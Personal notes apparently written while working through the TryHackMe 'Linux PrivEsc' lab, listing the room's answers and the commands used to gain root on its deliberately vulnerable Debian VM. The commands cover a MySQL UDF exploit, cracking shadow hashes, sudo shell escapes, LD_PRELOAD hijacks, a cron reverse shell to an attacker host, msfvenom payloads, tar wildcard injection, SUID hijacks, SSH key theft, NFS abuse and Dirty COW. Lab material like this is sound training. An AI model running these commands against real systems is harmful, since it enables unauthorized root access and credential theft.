tryhackme/Linux PrivEsc at main · gadoi/tryhackme · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
#Task 1 Deploy the Vulnerable Debian VM
- Deploy the machine and login to the "user" account using SSH.
hint: ssh user@10.10.201.78
no answer

- Run the "id" command. What is the result?
hint: id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)

#Task 2 Service Exploits
cd /home/user/tools/mysql-udf
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root
mysql>use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
exit;
/tmp/rootbash -p
#whoami
root
rm /tmp/rootbash


#Task 3 Weak File Permissions - Readable /etc/shadow
ls -l /etc/shadow
cat /etc/shadow
cp root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
on kali machine:
vi hash.txt
root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

- What is the root user's password hash?
hint: run john --view hash
or echo '$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0' > hash2.txt | hashid -m
sha512crypt


- What is the root user's password?
password123


#Task 4 Weak File Permissions - Writable /etc/shadow
ls -l /etc/shadow
mkpasswd -m sha-512 newpasswordhere
vi /etc/shadow
paste hash to
su root

- Read and follow along with the above.
no answer


# Task 5 Weak File Permissions - Writable /etc/passwd
ls -l /etc/passwd
openssl passwd newpasswordhere

Edit the /etc/passwd file and place the generated password hash between the first and second colon (:) of the root user's row (replacing the "x").

su root

change root -->newroot
and placing the generated password hash between the first and second colon (replacing the "x").
su newroot

Run the "id" command as the newroot user. What is the result?
answer: uid=0(root) gid=0(root) groups=0(root)
nor? uid=0(newroot) gid=0(root) groups=0(root)

#Task 6 Sudo - Shell Escape Sequences
sudo -l
Visit GTFOBins (https://gtfobins.github.io
OR https://github.com/t0thkr1s/gtfo
git clone https://github.com/t0thkr1s/gtfo
cd gtfo
python3 setup.py install
python3 gtpo.py vim

- How many programs is "user" allowed to run via sudo?
sudo -l
sudo -l | grep "(root)" | wc -l
11

- One program on the list doesn't have a shell escape sequence on GTFOBins. Which is it?
apache2


- Consider how you might use this program with sudo to gain root privileges without a shell escape sequence.
sudo -l
sudo -l
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more


+ (root) NOPASSWD: /usr/sbin/iftop
hint: python3 gtfo.py iftop
search iftop https://gtfobins.github.io
sudo iftop
!/bin/sh

+ (root) NOPASSWD: /usr/bin/find
hint: python3 gtfo.py find | grep sudo
search find https://gtfobins.github.io
sudo find . -exec /bin/sh \; -quit

+ (root) NOPASSWD: /usr/bin/nano
hint: python3 gtfo.py nano
sudo nano
^R^X
reset; sh 1>&0 2>&0
(sudo nano
Ctrl +R && Ctrl +X
reset; sh 1>&0 2>&0)

+ (root) NOPASSWD: /usr/bin/vim
hint: python3 gtfo.py vim | grep sudo
sudo vim -c ':!/bin/sh'
sudo vim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
sudo vim -c ':lua os.execute("reset; exec sh")'


+ (root) NOPASSWD: /usr/bin/man
hint: python3 gtfo.py man
sudo man man
!/bin/sh

+(root) NOPASSWD: /usr/bin/awk
hint: python3 gtfo.py awk | grep sudo
sudo awk 'BEGIN {system("/bin/sh")}'

+ (root) NOPASSWD: /usr/bin/less
hint: python3 gtfo.py less
sudo less /etc/profile
!/bin/sh

+ (root) NOPASSWD: /usr/bin/ftp
hint: python3 gtfo.py ftp
sudo ftp
!/bin/shsudo ftp
!/bin/sh


+ (root) NOPASSWD: /usr/bin/nmap
hint: python3 gtfo.py nmap
# Input echo is disabled.
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

-  -  -  -  -  -  -  -  -  -

# The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands.
sudo nmap --interactive
nmap> !sh

+ (root) NOPASSWD: /bin/more
hint: python3 gtfo.py more
TERM= sudo more /etc/profile
!/bin/sh


#Task 7 Sudo - Environment Variables
sudo -l
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
sudo LD_PRELOAD=/tmp/preload.so program-name-here
ldd /usr/sbin/apache2
exit
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
sudo LD_LIBRARY_PATH=/tmp apache2


- Read and follow along with the above.
no answer


#Task 8 Cron Jobs - File Permissions
cat /etc/crontab
locate overwrite.sh
ls -l /usr/local/bin/overwrite.sh
echo 'bash -i >& /dev/tcp/$IPlocal/4444 0>&1' > /usr/local/bin/overwrite.sh
on kali machine
nc -nvlp 4444


- Read and follow along with the above.
no answer


#Task 9 Cron Jobs - PATH Environment Variable
cat /etc/crontab
cd /home/user
vi overwrite.sh
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash

chmod +x /home/user/overwrite.sh
/tmp/rootbash -p
rm /tmp/rootbash
exit

- What is the value of the PATH variable in /etc/crontab?
/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin


#Task 10 Cron Jobs - Wildcards
on kali machine:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=$IpLOCAL LPORT=4444 -f elf -o shell.elf
On target machine:
chmod +x shell.elf
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf

--> on kali machine: nc -lnvp 4444
whoami
root

final:
rm /home/user/shell.elf
rm /home/user/--checkpoint=1
rm /home/user/--checkpoint-action=exec=shell.elf

- Read and follow along with the above.
no answer

#Task 11 SUID / SGID Executables - Known Exploits
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
Note that /usr/sbin/exim-4.84-3 appears in the results. Try to find a known exploit for this version of exim.
/home/user/tools/suid/exim/cve-2016-1531.sh
#whoami
root

- Read and follow along with the above.
no answer


#Task 12 SUID / SGID Executables - Shared Object Injection
The /usr/local/bin/suid-so SUID executable is vulnerable to shared object injection.
/usr/local/bin/suid-so

Run strace on the file and search the output for open/access calls and for "no such file" errors:
strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file"

Create the .config directory for the libcalc.so file:
mkdir /home/user/.config

Example shared object code can be found at /home/user/tools/suid/libcalc.c. It simply spawns a Bash shell. Compile the code into a shared object at the location the suid-so executable was looking for it:
gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/tools/suid/libcalc.c

/usr/local/bin/suid-so
whoami
root

- Read and follow along with the above.
no answer


#Task 13 SUID / SGID Executables - Environment Variables
$/usr/local/bin/suid-env

Run strings on the file to look for strings of printable characters:
$strings /usr/local/bin/suid-env

One line ("service apache2 start") suggests that the service executable is being called to start the webserver, however the full path of the executable (/usr/sbin/service) is not being used.
Compile the code located at /home/user/tools/suid/service.c into an executable called service. This code simply spawns a Bash shell:
$gcc -o service /home/user/tools/suid/service.c

Prepend the current directory (or where the new service executable is located) to the PATH variable, and run the suid-env executable to gain a root shell:
$PATH=.:$PATH /usr/local/bin/suid-env
#whoami

- Read and follow along with the above.
no answer


#Task 14 SUID / SGID Executables - Abusing Shell Features (#1)
The /usr/local/bin/suid-env2 executable is identical to /usr/local/bin/suid-env except that it uses the absolute path of the service executable (/usr/sbin/service) to start the apache2 webserver.
Verify this with strings:
$strings /usr/local/bin/suid-env2

In Bash versions <4.2-048 it is possible to define shell functions with names that resemble file paths, then export those functions so that they are used instead of any actual executable at that file path.
Verify the version of Bash installed on the Debian VM is less than 4.2-048:
$/bin/bash --version

Create a Bash function with the name "/usr/sbin/service" that executes a new Bash shell (using -p so permissions are preserved) and export the function:

$function /usr/sbin/service { /bin/bash -p; }
$export -f /usr/sbin/service

Run the suid-env2 executable to gain a root shell:
$/usr/local/bin/suid-env2
#whoami

- Read and follow along with the above.
no answer

#Task 15 SUID / SGID Executables - Abusing Shell Features (#2)
Note: This will not work on Bash versions 4.4 and above.
When in debugging mode, Bash uses the environment variable PS4 to display an extra prompt for debugging statements.
Run the /usr/local/bin/suid-env2 executable with bash debugging enabled and the PS4 variable set to an embedded command which creates an SUID version of /bin/bash:
$env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2

Run the /tmp/rootbash executable with -p to gain a shell running with root privileges:
$/tmp/rootbash -p
#whoami

- Read and follow along with the above.
no answer

#Task 16 Passwords & Keys - History Files
cat ~/.*history | less
- What is the full mysql command the user executed?
hint: cat ~/.*history | grep mysql
mysql -h somehost.local -uroot -ppassword123


#Task 17 Passwords & Keys - Config Files
ls /home/user
- What file did you find the root user's credentials in?
hint: cat /home/user/myvpn.ovpn
/etc/openvpn/auth.txt


#Task 18 Passwords & Keys - SSH Keys
ls -la /
Note that there appears to be a hidden directory called .ssh. View the contents of the directory:
ls -l /.ssh
cd /.ssh
ls
scp root_key user@$iplocal:/home/
on my kali machine
ssh -i root_key root@iptarget

- Read and follow along with the above.
no answer


#Task 19 NFS
cat /etc/exports
on mykalimachine
sudo su
mkdir /tmp/nfs
mount -o rw,vers=2 10.10.10.10:/tmp /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs /tmp/nfs/shell.elf
on target machine
/tmp/shell.elf
#whoami

- What is the name of the option that disables root squashing?
hint: cat /etc/exports
no_root_squash


#Task 20 Kernel Exploits
https://github.com/mzet-/linux-exploit-suggester
https://github.com/jondonas/linux-exploit-suggester-2
$perl /home/user/tools/kernel-exploits/linux-exploit-suggester-2/linux-exploit-suggester-2.pl
$gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w
$./c0w
$/usr/bin/passwd
#whoami

Remember to restore the original /usr/bin/passwd file and exit the root shell before continuing!
mv /tmp/bak /usr/bin/passwd
exit

- Read and follow along with the above.
no answer


#Task 21 Privilege Escalation Scripts
Experiment with all three tools, running them with different options. Do all of them identify the techniques used in this room?
https://github.com/diego-treitos/linux-smart-enumeration
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
https://github.com/rebootuser/LinEnum

https://0xsanz.medium.com/70-ways-to-get-root-linux-privilege-escalation-d98ec78f1405

https://tryhackme.com/room/linuxprivesc
https://therandomier.medium.com/tryhackme-linux-privesc-9ea2cfac3b76
https://www.aldeid.com/wiki/TryHackMe-Linux-PrivEsc
https://infosecwriteups.com/linux-privesc-tryhackme-writeup-bf4e32460ee5
https://0xsanz.medium.com/linux-privesc-tryhackme-a41eddc5b595


https://github.com/t0thkr1s/gtfo
search for https://gtfobins.github.io/gtfobins/tar/
https://johnjhacking.com/blog/linux-privilege-escalation-quick-and-dirty/
https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html